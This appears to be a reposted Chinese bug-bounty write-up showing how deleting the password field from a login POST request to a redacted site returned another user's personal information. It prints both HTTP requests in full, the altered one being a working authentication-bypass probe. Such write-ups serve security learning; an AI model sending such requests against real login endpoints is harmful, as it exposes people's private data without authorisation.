记一次泄露PII的漏洞挖掘经历

admin
admin
admin
103517
文章
87
评论
2023年6月27日13:55:00评论41 views字数 1354阅读4分30秒阅读模式

记一次泄露PII的漏洞挖掘经历

泄露PII的漏洞挖掘经历

什么是PII(Personal Identifiable Information)

个人可识别信息

这是有关一个人的数据,这些数据能帮助识别这个人,如姓名、指纹、电子邮件地址、电话号码等。

我使用提供的凭据进行测试,提交了我的用户名和密码并收到以下请求:

POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1
Host: redact.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Origin: redact.com
Referer: redact.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"login":"[email protected], "password": "test1337"}

我从请求中删除了密码字段及其值,如下:

POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1
Host: redact.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Origin: redact.com
Referer: redact.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"login":"[email protected]"}

然后该用户的 PII 被泄露,并且显示了私人信息。

这是我收到的返回包:

记一次泄露PII的漏洞挖掘经历

有时,您需要尝试输入字段并处理一些意外行为。这就是为什么执行手动测试很重要,而不仅仅是依赖模糊测试,这可能会对网站造成损害。

文章来源:HACK学习呀


黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

记一次泄露PII的漏洞挖掘经历

多一个点在看记一次泄露PII的漏洞挖掘经历多一条小鱼干


原文始发于微信公众号(黑白之道):记一次泄露PII的漏洞挖掘经历

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月27日13:55:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次泄露PII的漏洞挖掘经历https://cn-sec.com/archives/1837128.html

发表评论

匿名网友 填写信息